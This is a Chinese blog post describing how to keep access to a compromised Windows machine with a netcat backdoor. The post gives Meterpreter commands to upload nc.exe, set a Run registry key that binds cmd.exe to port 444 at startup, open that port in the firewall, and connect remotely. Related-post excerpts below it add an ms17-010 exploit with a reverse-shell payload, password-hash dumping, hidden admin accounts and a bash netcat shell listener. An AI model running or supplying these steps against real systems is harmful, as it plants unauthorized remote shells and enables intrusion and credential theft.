kali linux权限维持,权限维持篇-NC后门

最新推荐文章于 2024-03-07 11:59:27 发布
最新推荐文章于 2024-03-07 11:59:27 发布
阅读量437 收藏 1
点赞数
文章标签: kali linux权限维持

今天一直在总结msf的命令,看到TRY大佬的NC后门,感觉不错,特来复现一下。

前提

拿到一个shell,并且还需要提权,以高权限进行后门利用,否则会失败。因为整个过程,需要操控注册表来完成。

低权限的失败案例:

4cf4cc7b3350726a173cda28a61777a9.png

后门安置

上传NC

Kali中带有Windows下的NC。

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

解释一下为什么上传了两遍的原因,不知道什么原因,一直上传不到system32文件夹内,权限是没用问题的。于是,我就上传到了Windows文件下,然后又拖到system32文件下。

注册表配置

枚举run下的key(该注册表控制计算机启动项)

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

设置键值

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’

查看键值

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc

6d77eb45fa1442fad13093605420a22a.png

防火墙配置

开放我们刚才设置的端口,444端口,”Firewall”为其描述

netsh firewall add portopening TCP 444 "FireWall" ENABLE ALL

配置该防火墙选项,我们需要起一个shell来完成:

7781f1ee9f7f40e3a7dc45e3adabb8d8.png

设置完之后,需要等到下次计算机重启之后,后门才有效。

连接后门

使用命令

nc -v 目标IP 444

486e9e6d1d17388b28eddc37f30ab20d.png

总结

经测试,此NC后门并不能用于高权限的维持。NC后门得到的shell为计算机登录用户的shell,本地环境和域环境均有效。如果是计算机登录的是域管账号,那么我们也会得到一个域管权限。

weixin_39829236
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux渗透基础知识整理(四):维持访问
blotemj.blog.csdn.net
08-16 315
在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限。使用木马程序、后门程序和rootkit来达到这一目的。维持访问是一种艺术形式,思想比渗透更加重要。 Netcat Cryptcat weevely cymothoa Netcat NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的...
kali linux权限维持,msfconsole权限维持
weixin_30481539的博客
04-29 603
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...
【网络安全】内网渗透NC木马后门复现
最新发布
一直被模仿,从未被超越
03-07 470
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。首先假设已经通过Kail成功入侵靶机。2、通过注册表设置开机启动。
nc后门
zgwz123456的博客
03-21 1307
实验环境 靶 机:windows 7 攻击机:kali 漏洞利用:ms17-010 msfconsole use exploit/windows/smb/ms17_010_eternalbule set payload windows/x64/meterpreter/reverse_tcp set rhosts 192.168.21.134 set lhost 192.168.21.130 set lport 6666 run 拿到权限后上传我们的nc后门程序(我把它改名成了qq) 查看启动项的键值项,
权限提升以及抓取密码以及权限维持流程(附内网环境实现)
markecheng的博客
12-24 782
前言 内网环境错综复杂,在实战中,有可能遇到十个,是个都是不同的内网环境,这里展示的是,对我们打点进入内网之后,我们需要往里面更加的深入的话,需要在获取权限的目标机器基础上才能横向移动,但是,没有足够高的权限以及没有足够稳定的权限,那我们就不能进行安稳的横向移动,所以,在我整合了一些资料之后,有一套比较完整的权限提升以及权限维持的流程,接下来分享给各位观看的师傅们,如果有帮助你们的地方,不胜荣幸(书上理论很多,我是从实战的角度来弄得,所以理论说的很少,想要了解相关理论的话,可以自行看书) 环境 条件及目标
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part4)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用: kali-linux-2022.2-virtualbox-amd64.part1 ...kali-linux-2022.2-virtualbox-amd...
MSF之meterpreter权限维持
梦想专栏
07-30 2060
00×01 首先,我们先来生成一个 meterpreter 类型的 PALOAD : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit : use exploit/mutil/handler set payload wi...
病毒分析--WannaCry分析--1
cyynid的博客
01-14 2520
分析监控的日志以及自行观察操作之后,可以分析出样本的恶意行为:自我复制样本到C盘:C:\ProgramData目录下,启动C:\ProgramData\@WanaDecryptor@.exe(即病毒程序)释放了并运行了taskeche.exe程序3.在程序目录下创建@Please_Read_Me@.txt、@WanaDecryptor@.exe以及.WNCRY文件4.在C:\ProgramData目录下创建xxx文件夹(文件名随机)5。
windows权限维持
qq_46527080的博客
02-25 1161
windows权限维持一、添加影子账户二.nc自启动(需要一个nc程序)三、msf权限维持四、powshell权限维持 一、添加影子账户 1.首先常见一个影子账户(隐蔽的) net user chao1$ passwd /add 加入用户管理员组 net localgroup administrators chao1$ /add 2.打开注册表编辑器regedt32 打开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users键值,然后找到admin对应的类型
Linux后门初探(一)
d_0xff的博客
05-27 1670
Linux下创建后门方式一默认情况下 GNU netcat 不支持持续性监听操作。每一次Accept并执行完命令之后,netcat就会断开连接。如果需要让 netcat 保持持续性监听状态,就必须使用循环语句不断的开启新的监听模式。listener.sh 监听脚本#!/bin/bash while [ 1 ]; do echo -n | netcat -l -v -p 445 -e /bin/ba
Kali Linux渗透测试之服务扫描(二)——SNMP、SMB、SMTP扫描
橘子女侠
04-16 6693
1. SNMP扫描 SNMP:简单网络管理协议 基于SNMP,进行网络设备监控,如:交换机、防火墙、服务器,CPU等其系统内部信息。基本都可以监控到。 community:登录证书,容易被管理员遗忘修改其特征字符 #可用字典破解community(public/private/manager); 信息的金矿,经常被错误配置; MIB Tree: SNMP Management In...
kali修改文件权限不够_windows/system32文件夹权限问题
weixin_39557797的博客
11-20 1685
起因是virtualbox虚拟机中的kali以及metasploit2老是崩溃,内存0x000000000无法写入。网上查到解决办法替换3个dll文件,themeservice.dll,themeui.dll,uxtheme.dll。网上下了这三个文件,复制进c:windowssystem32文件夹时显示权限不够。印象中以前复制dll文件到system32中也没有问题。权限不够原因是,即使作为管理...
kali-linux渗透测试之NC工具
weixin_43803070的博客
05-14 1575
** 端口扫描 ** root@kali:~# nc -nvz 192.168.1.110 1-65535 root@kali:~# nc -nvz 192.168.1.110 1-1024 //-z扫描模式 默认情况下,使用的是tcp协议探测,探测到也是tcp端口。 如果说想探测udp端口 nc -nvzu 加u 并不是每个扫描器扫描的结果都是正确的,因为过滤器或者防火墙会影响扫描结果...
kali linuxnc使用
黑猫'blog
03-05 1434
NC的常用功能: 标题telnet / 获取banner信息 传输文本信息 传输文件/目录 加密传输文件 流媒体服务器 远程克隆硬盘 标题telnet / 获取banner信息 nc -nv 1.1.1.1 110 nc -nv 1.1.1.1 25 nc -nv 1.1.1.1 80 传输文本信息 A:nc -l -p 888 >lsof.txt B:lsof | nc -nv 1.1.1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值